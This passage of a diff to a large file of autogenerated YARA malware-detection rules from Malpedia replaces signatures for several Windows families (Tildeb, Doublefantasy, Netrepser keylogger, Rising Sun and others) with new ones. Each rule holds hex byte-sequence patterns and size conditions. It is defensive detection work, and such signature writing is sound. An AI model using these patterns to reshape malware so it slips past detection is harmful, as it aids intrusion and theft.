+		$sequence_26 = { 894dfc eb0e 8b14957c303400 49 0fafd1 0155fc }
+		$sequence_27 = { 0f872affffff 0fb6805a213400 ff2485f6203400 8b8614080000 3b45f4 }
+		$sequence_28 = { 895da8 ab ab ab ff15???????? }
+		$sequence_29 = { 80bda4fbffff22 8d85a4fbffff 750a c645ff22 8d85a5fbffff 8b35???????? }
+		$sequence_30 = { ff75e0 ffd7 ff75cc ffd7 8d46fe 3b45f4 }
+		$sequence_31 = { 8bdf 8b06 83661c00 83f807 0f87c9000000 ff248580233400 }
 
 	condition:
-		7 of them and filesize < 1429504
+		7 of them and filesize < 1350656
 }
-rule MALPEDIA_Win_Tildeb_Auto : FILE
+rule MALPEDIA_Win_Vsingle_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "49677524-14e6-56de-966e-12587dbc120c"
+		id = "cc9fe25a-3024-59d5-8bbd-cc483f35b4a0"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tildeb"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.tildeb_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vsingle"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.vsingle_auto.yar#L1-L166"
 		license_url = "N/A"
-		logic_hash = "ff05557691123d6857c3cb5d609bf2746dd344811b380372ecacb54f0277a087"
+		logic_hash = "ea6b709a9def94eb8d7fd51d94ddf5ae4235a8cf02f9fd365b88bc3b6358449b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96041,32 +96209,38 @@ rule MALPEDIA_Win_Tildeb_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c404 51 ffd3 f6460c10 74a3 5d 8b5c2410 }
-		$sequence_1 = { 51 52 50 56 ffd7 8b542414 8b1d???????? }
-		$sequence_2 = { 5e 81c494010000 c3 b808000000 5e }
-		$sequence_3 = { 56 57 8965e8 6a40 ff15???????? 50 ff15???????? }
-		$sequence_4 = { 8b0d???????? 51 ff15???????? e9???????? 6a00 6a02 68???????? }
-		$sequence_5 = { 33dd 8bac24b4000000 33dd 8bac24ac000000 33dd 8bac24d0000000 }
-		$sequence_6 = { 8b442414 c6400101 8b442410 85c0 744b }
-		$sequence_7 = { 0bd9 8b8c24ac000000 33ea 03cb 33ef 03e9 }
-		$sequence_8 = { 5b c3 8b3d???????? 6a02 53 56 ffd7 }
-		$sequence_9 = { bf???????? f3ab 8d85e4f9ffff 50 8b8ddbf5ffff 81e1ff000000 51 }
+		$sequence_0 = { 66898568fdffff 8d8d6cfdffff 51 0fb79568fdffff }
+		$sequence_1 = { 668955f8 b801000000 6bc800 8a540de8 }
+		$sequence_2 = { 83c204 8955fc 8b45f8 0345fc 8b4d10 8908 8b55fc }
+		$sequence_3 = { 668955f9 8855fb c785d4fbffff07020000 8d85d4fbffff }
+		$sequence_4 = { 668955f8 c745f46c4e078e 8b450c 8945fc }
+		$sequence_5 = { 8a540de8 8815???????? b801000000 c1e000 8a4c05e8 880d???????? 8d55ea }
+		$sequence_6 = { 8a5415f8 88540df8 b801000000 d1e0 b901000000 c1e100 8a5405f8 }
+		$sequence_7 = { 668955ee c745f000000000 b810000000 668945f8 c745f4f756bd64 eb20 }
+		$sequence_8 = { 81e90ccf1926 394dfc 59 7505 e9???????? 50 }
+		$sequence_9 = { 81f7e7c25008 81c7892b0bc9 81c748a095dd eb11 }
+		$sequence_10 = { 51 b9a251215b 81c1ea838beb 81f149ac3b55 }
+		$sequence_11 = { 51 b91604ec6b e9???????? 81f097f6a505 81f057a7f1cc }
+		$sequence_12 = { 885da0 eb21 81eaf7fb4a93 81f21bea8dcb 81c25444399b }
+		$sequence_13 = { 81f1367858fe 81f12158256c 894c2404 59 ff15???????? }
+		$sequence_14 = { 50 b89da54c19 81c01ab7de15 81f05c64d929 81f0714ef44c }
+		$sequence_15 = { 81c3af0f8c7e e9???????? 81c3ea117171 81c36738f462 81c315173337 81c3beb17872 81eb4b94fb51 }
 
 	condition:
-		7 of them and filesize < 8532488
+		7 of them and filesize < 940032
 }
-rule MALPEDIA_Win_Doublefantasy_Auto : FILE
+rule MALPEDIA_Win_Nullmixer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5fe3121c-5496-55ab-9366-675d7b098073"
+		id = "b38b3d85-051a-5533-80ac-2c20e10e6e40"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doublefantasy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doublefantasy_auto.yar#L1-L176"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nullmixer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nullmixer_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "a1a10ee4973cf324c6bb6108700a68b5d1131343a7e5a1c18b7924dc06048831"
+		logic_hash = "bed10b9aa89a73eeb2144099fe0c5f1e459e50018915c4280b459d1a0374a95d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96080,38 +96254,32 @@ rule MALPEDIA_Win_Doublefantasy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d50fd 891485a4ab2700 40 3bc1 72f1 833d????????fd 7516 }
-		$sequence_1 = { 50 8d45d4 50 ff7508 ff15???????? 83c41c }
-		$sequence_2 = { 57 53 68???????? ff75d8 8b35???????? ffd6 8945e0 }
-		$sequence_3 = { 33d2 8a5001 c1ee06 83e20f c1e202 0bd6 8a92908c2700 }
-		$sequence_4 = { 40 c3 33c9 3b05???????? 0f9cc1 8bc1 c3 }
-		$sequence_5 = { 50 ff15???????? 897e10 897e0c 8b7620 3bf7 }
-		$sequence_6 = { 8b442404 0fb608 c1e902 8a91908c2700 8b4c2408 }
-		$sequence_7 = { 0bd6 8a92908c2700 eb02 b23d 837c241002 }
-		$sequence_8 = { 3c7a 770b 0fb6c0 8a80ad8c2700 eb02 }
-		$sequence_9 = { 68???????? e8???????? 8b4605 c68094a3270000 ff35???????? ff35???????? }
-		$sequence_10 = { ff35???????? e8???????? 83c41c e8???????? 33ff e9???????? }
-		$sequence_11 = { 85c9 7616 8da42400000000 8d50fd 891485a4ab2700 40 }
-		$sequence_12 = { c745e405400080 8365fc00 c745fc01000000 8b7508 8b4620 85c0 7477 }
-		$sequence_13 = { 8a92908c2700 885101 7e1c 0fb67002 33d2 8a5001 }
-		$sequence_14 = { e8???????? 50 6a5c 57 }
-		$sequence_15 = { 837df804 59 7426 6800002000 }
+		$sequence_0 = { 0b45d0 0f8436ffffff 837db840 7475 89f0 8d7728 83c302 }
+		$sequence_1 = { 8b4508 8b7518 894db0 8d4dcf 8945bc 8b450c 8945b4 }
+		$sequence_2 = { 807dcf01 0f8447030000 8b4520 c70000000000 c7400400000000 8b451c c70004000000 }
+		$sequence_3 = { 0fb61c37 8d4508 e8???????? 38c3 0f851cfeffff 8b4d08 83c601 }
+		$sequence_4 = { 8b842498000000 895c2404 6631db 89442418 8b842494000000 89442414 8b842490000000 }
+		$sequence_5 = { 89ce 0f85a8080000 38d0 0f845d080000 8b4d08 0fb7750c 85c9 }
+		$sequence_6 = { 83ec04 84c0 740a 8b8424c4000000 830802 0fb744247c 8b7c2478 }
+		$sequence_7 = { 55 57 56 53 8b442418 8b7904 8b74241c }
+		$sequence_8 = { 89c6 8b00 8b4010 3d???????? 0f8598030000 8d45d9 8d4ddc }
+		$sequence_9 = { e8???????? 89c3 893424 89d9 e8???????? 83ec04 8d45e0 }
 
 	condition:
-		7 of them and filesize < 172032
+		7 of them and filesize < 2351104
 }
-rule MALPEDIA_Win_Highnote_Auto : FILE
+rule MALPEDIA_Win_Rekoobew_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "42430ae0-711a-5af0-8cf0-021ee7268750"
+		id = "87c5607a-8a90-598c-943e-607b112d1594"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.highnote"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.highnote_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rekoobew"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rekoobew_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "9c56af2f565860a63358a81454cb924c53c1536bda24fa1a3a598c536c013797"
+		logic_hash = "aef627dbf43f3f433f140924ae4bed9b7cb42ca10d8749c65899eb3d41030244"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96125,116 +96293,110 @@ rule MALPEDIA_Win_Highnote_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3c7b bc9e36398f 8027e9 82ad42476080cd e009 }
-		$sequence_1 = { 47 365e 3007 7bae 97 9d 884d13 }
-		$sequence_2 = { a8b9 a1???????? 9c 6857414608 d4dc 59 93 }
-		$sequence_3 = { 33c5 8945fc 8b4508 53 6808090000 8945e4 e8???????? }
-		$sequence_4 = { 4f 59 7def 889de81be9ec b96b0b724f 262415 3a1f }
-		$sequence_5 = { 0e ed 47 6908b79d84b8 6935????????3e1f20f8 4a d14529 }
-		$sequence_6 = { e76e a9a4fec7f3 1b90bff8ccdd b1e4 f7f4 }
-		$sequence_7 = { 3b3f a3???????? 0c16 49 3852fc d938 6e }
-		$sequence_8 = { 1cfe 5f 3d4b9c06b4 12a4c5ea7849d5 ba7ab47152 1c98 d24cdca8 }
-		$sequence_9 = { 3cff 145d 853e 235ee7 }
+		$sequence_0 = { 333cb5e07c4000 33bb14010000 89d6 c1ee10 81e6ff000000 333cb5e0744000 8b4dec }
+		$sequence_1 = { 0fb6f5 3314b5e08c4000 83c720 0fb6ca 8b348de0904000 }
+		$sequence_2 = { 83c202 c60200 5b 5e 5d c3 }
+		$sequence_3 = { 31cf 8b4de8 0fb6f5 8b0cb5e0804000 }
+		$sequence_4 = { 333495e0744000 8b4de8 0fb6d5 89f1 330c95e0784000 83c720 0fb655e4 }
+		$sequence_5 = { 31f9 034df0 89c3 c1c305 01d9 c1c71e 8b5db0 }
+		$sequence_6 = { c1c705 01fa c1c01e 8b7de4 337dec 337db8 337dbc }
+		$sequence_7 = { 0fb65005 c1e210 09f2 0fb67007 09f2 0fb67006 }
+		$sequence_8 = { 89f3 31d3 21cb 31d3 035df0 89c7 c1c705 }
+		$sequence_9 = { 89d6 8b55e8 3314b5e08c4000 8955e0 }
 
 	condition:
-		7 of them and filesize < 321536
+		7 of them and filesize < 248832
 }
-rule MALPEDIA_Win_Bunitu_Auto : FILE
+rule MALPEDIA_Win_Keyhole_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b836f62d-ccb0-5139-8fb4-d5cfc207aba0"
+		id = "1776d34a-8ed1-5870-82db-2a2698f47369"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bunitu"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bunitu_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyhole"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.keyhole_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "1cf3d7359d010e00d7ff20ba5e701d6257e9f7229ca17c7a247d649a01d8b461"
+		logic_hash = "64c3a1f6c6135646d67c8ef7bc09175e7e75133412ea28a0c20d12643fea552c"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 8d8c29d4feffff 0fb709 8bf9 59 8d8dd9feffff c6040800 3680bc28d8feffff2f }
-		$sequence_1 = { 6a00 50 ff15???????? 6a00 68e8030000 ff15???????? 33c0 }
-		$sequence_2 = { 8b4508 8b08 894df8 8b4804 894dfc c7400400000000 c70000000000 }
-		$sequence_3 = { 7412 48 50 ff7508 ffb528fdffff e8???????? }
-		$sequence_4 = { e8???????? 8945fc c78560feffff00000000 0f31 }
-		$sequence_5 = { 50 ff75ec e8???????? 0bc0 7e18 50 }
-		$sequence_6 = { c70003000000 ffb524fdffff 8f4004 ffb528fdffff }
-		$sequence_7 = { ffb524fdffff e8???????? eb12 6a08 68???????? ffb524fdffff e8???????? }
-		$sequence_8 = { 81c458feffff 8dbd58feffff b91c000000 33c0 f3aa e8???????? }
-		$sequence_9 = { 2bfa 87fa 5f 8bc2 48 40 }
+		signator_config = "callsandjumps;datarefs;binvalue"
+		malpedia_rule_date = "20241030"
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { 5b 8bc7 5f 5e 83c40c c3 6a05 }
+		$sequence_1 = { 5f c3 56 6a00 ffd3 50 ff15???????? }
+		$sequence_2 = { 25ff030000 0fbf8445a01c0000 8944242c 85c0 0f889b000000 8bc8 }
+		$sequence_3 = { f3ab 8bcb 83e103 f3aa 8b442414 8a4c2413 eb18 }
+		$sequence_4 = { 0f57c0 c1e208 0bd0 660fd6442454 8bc6 c1e818 0bd0 }
+		$sequence_5 = { 8b4304 6a00 89442421 8d442418 6a0d 50 ff7308 }
+		$sequence_6 = { c3 57 8b7904 85ff 7404 8b01 8907 }
+		$sequence_7 = { 68???????? 53 ffd7 5e 5d 5f }
+		$sequence_8 = { 8d7c242c 8bca 03fd 8bd9 c1e902 6601944612860000 }
+		$sequence_9 = { c1eb10 8b442410 c1e208 0fb6c0 0bd0 0fb6c3 }
 
 	condition:
-		7 of them and filesize < 221184
+		7 of them and filesize < 303104
 }
-rule MALPEDIA_Win_Netrepser_Keylogger_Auto : FILE
+rule MALPEDIA_Win_Sidetwist_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7f57cd5d-92d6-5b8d-9329-1faf79bf30fb"
-		date = "2024-10-31"
-		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netrepser_keylogger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.netrepser_keylogger_auto.yar#L1-L170"
+		id = "234f5e67-21ea-563f-a765-16d670746925"
+		date = "2023-12-06"
+		modified = "2023-12-08"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sidetwist"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.sidetwist_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "301814f110ed56d36474cf3f699ac02f8540c1721eebd9fd906c701050fc9a5d"
+		logic_hash = "5b593ac062a3ee588643c8e2045ef28da674c3f54189c5d0eebe42dcfcc6f71f"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
+		malpedia_rule_date = "20231130"
+		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
+		malpedia_version = "20230808"
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c645f368 c645f472 c645f565 c645f661 c645f764 c645f849 }
-		$sequence_1 = { c645d259 c645d350 c645d454 c645d533 c645d632 c645d72e }
-		$sequence_2 = { 52 8d85f0faffff 50 ff15???????? 50 8d8df0faffff 51 }
-		$sequence_3 = { 83c404 8b95e4feffff 8955f8 e9???????? 33c0 }
-		$sequence_4 = { 0f8537010000 8b55f0 8d441202 50 }
-		$sequence_5 = { 884df7 0fb655f7 85d2 7507 b801000000 eb5f 0fb645f7 }
-		$sequence_6 = { a1???????? 8985f4feffff 8b0d???????? 898df8feffff eb04 }
-		$sequence_7 = { c7410800000000 8b5518 c70200000000 8b4518 }
-		$sequence_8 = { 50 e8???????? 33db 83c404 33c9 }
-		$sequence_9 = { 83ec44 a1???????? 33c4 89442440 a1???????? 85c0 753f }
-		$sequence_10 = { 6a04 8d542424 52 8d461c }
-		$sequence_11 = { 8b8c241c010000 83c414 5e 33cc }
-		$sequence_12 = { 8b551c 3b5518 741e ff15???????? }
-		$sequence_13 = { c6461eff c6461fd0 b820000000 5b 83c40c c3 }
-		$sequence_14 = { 8d442404 50 6a00 ff15???????? 8d0c24 51 ff15???????? }
-		$sequence_15 = { 50 83ec2c a1???????? 3145f8 33c5 894560 53 }
+		$sequence_0 = { c644244600 4839d0 0f833a020000 488b4c2450 837c2458ff 0f94c0 4885c9 }
+		$sequence_1 = { e8???????? 807e2000 48898424b0000000 7412 488d8c24b0000000 ba20000000 e8???????? }
+		$sequence_2 = { 4488742457 0fb6442457 4c8db42494000000 4c8d4c2460 4889fa 4c89742440 488d8c2480000000 }
+		$sequence_3 = { 89c8 884520 807d2040 7612 807d205a 770c 0fb64520 }
+		$sequence_4 = { 896e18 4809c3 4889f8 488917 48895f08 4883c458 5b }
+		$sequence_5 = { bfffffffff 41bfffffffff e9???????? c644246c00 8844246e e9???????? 488b03 }
+		$sequence_6 = { 4c29cb 4c39c3 490f47d8 4885db 7411 480310 4883fb01 }
+		$sequence_7 = { 7218 4c8b05???????? 458b08 4585c9 755e 448b41f8 4585c0 }
+		$sequence_8 = { 89c7 440fb603 29df c1e702 4885c0 b800000000 0f44f8 }
+		$sequence_9 = { 6690 4885d2 7521 448b1e 4585db 0f8524020000 8b05???????? }
 
 	condition:
-		7 of them and filesize < 303104
+		7 of them and filesize < 2002944
 }
-rule MALPEDIA_Win_Rising_Sun_Auto : FILE
+rule MALPEDIA_Win_Byeby_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e7041472-db64-5ca5-926c-a3eb0b3a9cad"
+		id = "9611b4e7-8337-551b-9691-e65f61744e7f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rising_sun"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rising_sun_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.byeby"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.byeby_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "7e3e464c1a03d1cb6ef88adda73a2c17dabfe5f93751654747dc236b8a8e7509"
+		logic_hash = "50a28d5ba51c4cf2da918fb2e13d81e48eb5727c5e9589337c757040c753f599"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96248,32 +96410,32 @@ rule MALPEDIA_Win_Rising_Sun_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488b8a48000000 4883c138 e9???????? 488b8a48000000 4883c160 e9???????? }
-		$sequence_1 = { 44886c2440 488d8db8000000 4883bdd000000008 480f438db8000000 bf03000000 4c8b85c8000000 4c3bc7 }
-		$sequence_2 = { 4533c9 4533d2 488bd9 4963f8 }
-		$sequence_3 = { 488b8d10030000 4833cc e8???????? 4c8d9c2420040000 498b5b28 498b7330 498b7b38 }
-		$sequence_4 = { 0f8498feffff 488d5506 488bcb ff15???????? 488905???????? 4885c0 0f847bfeffff }
-		$sequence_5 = { 4181f9000000c0 7532 4585d2 756e 488d4b04 4c8d059e520000 418d5216 }
-		$sequence_6 = { 4883ec20 33c0 48c7411807000000 488d15a97d0200 48894110 4983c9ff 4533c0 }
-		$sequence_7 = { c78534590000c1ba3099 c785385900002c7b2848 c7853c590000a1d91b85 c78540590000ea4058b5 c78544590000e6ecbf88 66c7854859000094a8 e8???????? }
-		$sequence_8 = { e9???????? 488bcd e8???????? 48ffc3 4c8be8 e9???????? 48ff4548 }
-		$sequence_9 = { c744246c3ffbe9ea c7442470f94bc72d c7442474d9ec5e31 c7442478b1fab2fb c744247c3ecc0cc2 c74580af6c9d01 c74584614a63ca }
+		$sequence_0 = { eb0c befdffffff eb05 befeffffff }
+		$sequence_1 = { 8907 ff15???????? 40 8d8c243f0a0000 034c241c 8d7f04 03f0 }
+		$sequence_2 = { 741a 6a00 8bc7 2bc6 50 8b44241c 03c6 }
+		$sequence_3 = { c745e400000000 85c9 7404 33ff eb03 8d7e48 }
+		$sequence_4 = { ff15???????? 8b35???????? 8d84243c060000 50 8d8424380a0000 50 ffd6 }
+		$sequence_5 = { 80bc05e7feffff5c 7411 8d85e8feffff 50 ffd6 }
+		$sequence_6 = { 50 57 ff15???????? 85c0 7461 8d642400 }
+		$sequence_7 = { 8d85a8feffff 50 8d8584fcffff 50 6a00 }
+		$sequence_8 = { 0fbec2 0fb680d0450110 83e00f eb02 33c0 8bbdc8fdffff 6bc009 }
+		$sequence_9 = { 57 ff15???????? 85c0 0f84f6010000 8b542418 03542414 }
 
 	condition:
-		7 of them and filesize < 409600
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Voidoor_Auto : FILE
+rule MALPEDIA_Win_Gcman_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "92ea84a1-8606-53ec-b061-29e92893f1a1"
+		id = "e71f2c5a-eff6-5ad7-8a03-8a2026572314"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.voidoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.voidoor_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gcman_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "c7810f3b0438aab57f906bea825e4f8545638ef9f814f76d8e4defd0ecb553e3"
+		logic_hash = "0044f6cfe83ca73eacc555f31b65cfd944699d03aa8981a24b8fc516dccbcc72"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96287,32 +96449,32 @@ rule MALPEDIA_Win_Voidoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 8d4db8 e9???????? 8d8d70ffffff e9???????? 8d8d40ffffff e9???????? }
-		$sequence_1 = { ffb6d80b0000 ffb6a0090000 68???????? e8???????? 83c40c 85c0 74a5 }
-		$sequence_2 = { 5b 8b4c241c 33cc e8???????? 83c420 c3 8b7e04 }
-		$sequence_3 = { c744242801000000 8dbbbc000000 6a40 8d442424 50 6a02 ff742420 }
-		$sequence_4 = { ff30 ff15???????? 8b4308 83c41c c70000000000 33c0 81fd00030980 }
-		$sequence_5 = { b90b000000 f3a5 8d836c010000 50 8d833c010000 50 ff742418 }
-		$sequence_6 = { ff5018 eb07 8bce e8???????? 8b4de8 8bd8 895de4 }
-		$sequence_7 = { c70016000000 e8???????? 83c8ff 0bd0 eb35 e8???????? 85c0 }
-		$sequence_8 = { e8???????? 8bf0 83c404 85f6 7508 8d7001 e9???????? }
-		$sequence_9 = { e8???????? 6a00 32d2 8d4db4 c645fc08 e8???????? 83c434 }
+		$sequence_0 = { c744240400100000 8d85d8efffff 890424 e8???????? 8d85d8efffff }
+		$sequence_1 = { c74008fedcba98 8b4508 c7400c76543210 8b4508 }
+		$sequence_2 = { 89c2 83e230 8b4508 40 0fb600 }
+		$sequence_3 = { 898590e7ffff 833d????????00 750a c78590e7ffffdd624000 8b8590e7ffff 8944240c c7442408???????? }
+		$sequence_4 = { 8b4508 890424 e8???????? 8d0403 }
+		$sequence_5 = { 8b00 c1e818 8802 8b5508 83c204 8b450c 8b4004 }
+		$sequence_6 = { 8b4df0 01c1 8b45f4 89c2 c1e206 b0c0 20d0 }
+		$sequence_7 = { 31ce 0375a8 01f3 81eb06d85e15 c1c30b 01c3 }
+		$sequence_8 = { c1c004 01d0 89c6 31d6 31ce 0375a8 01f3 }
+		$sequence_9 = { 40 890424 e8???????? 8945fc 8b45fc 89442408 8b450c }
 
 	condition:
-		7 of them and filesize < 1744896
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Doppeldridex_Auto : FILE
+rule MALPEDIA_Win_Donex_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7bc1de9c-56ca-5544-aabb-578c6d2a6765"
+		id = "8482aba2-5d7c-5acf-8ac0-6f701bcd4c3c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.doppeldridex"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.doppeldridex_auto.yar#L1-L162"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.donex"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.donex_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "f94875582e8b5aa2ebc993fa0b95159a94408b6d25288caadf3c8433582dd0a1"
+		logic_hash = "791a2daeadd431298c15aca6e723243f3ba034df68a0c21a097c95582d44c9bb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -96326,40 +96488,34 @@ rule MALPEDIA_Win_Doppeldridex_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 01501c 015020 015024 01500c }
-		$sequence_1 = { 01500c 833920 751c 8bc1 }
-		$sequence_2 = { 011483 40 3b06 7cf8 }
-		$sequence_3 = { 010c28 8b4e04 42 8d41f8 d1e8 }
-		$sequence_4 = { 017c240c 3b5c2408 0f822affffff ff74240c }
-		$sequence_5 = { 33d2 3b7c2414 0f4cd3 032c24 03ee 2bea }
-		$sequence_6 = { 030c24 0fbe01 88442458 85c0 }
-		$sequence_7 = { 0306 894218 47 3b7c2408 }
-		$sequence_8 = { 897dc4 8955c8 893424 c744240400000000 c744240864000000 898548ffffff }
-		$sequence_9 = { 8945d4 0f84b3feffff e9???????? 8b45e0 }
-		$sequence_10 = { eb0c 8b45dc 6683785c03 7414 eb6e 8b45ec }
-		$sequence_11 = { 83fa00 89459c 8955e0 7475 e9???????? b801000000 8b4d98 }
-		$sequence_12 = { 8b5df0 81f330d7a128 8b4de8 8b541104 39da }
-		$sequence_13 = { 8955f8 ebe7 55 89e5 50 }
-		$sequence_14 = { 8945ec 894de8 897de4 742c eb0c }
-		$sequence_15 = { 83fa20 0f92c4 8a6db3 20cd 20e5 f6c501 8955b4 }
+		$sequence_0 = { 03c2 8b55f4 c1c008 03c2 8945ec 8b45fc 8bc8 }
+		$sequence_1 = { 2345f8 0375cc 0bc8 034dc4 03f7 8b45f4 8b7de8 }
+		$sequence_2 = { e8???????? 8b404c 83b8a800000000 7512 8b04bd08a44300 807c302900 7504 }
+		$sequence_3 = { 40 50 8d8598fcffff 50 e8???????? eb09 ff750c }
+		$sequence_4 = { 2345ec 0bc1 c145f40a 034598 8b4dd8 03c2 }
+		$sequence_5 = { c1c00e 8bce 03c2 f7d1 234dec 81c2e9766d7a }
+		$sequence_6 = { 897df0 3b7dfc 0f826cffffff ff75e8 ff15???????? ff75ec e8???????? }
+		$sequence_7 = { 8bca c1c906 33f9 8b4df4 33cb 23ca 334df4 }
+		$sequence_8 = { 56 57 56 c706ffffffff e8???????? 83c40c 8945fc }
+		$sequence_9 = { 83c408 85db 7529 57 ff7508 e8???????? 8bd8 }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 505856
 }
-rule MALPEDIA_Win_Sakula_Rat_Auto : FILE
+rule MALPEDIA_Win_Buhtrap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "86323bfd-db14-578a-8cfe-f67cc00a757a"
+		id = "05dfe1b7-7658-5a73-95c7-d9332b18397d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
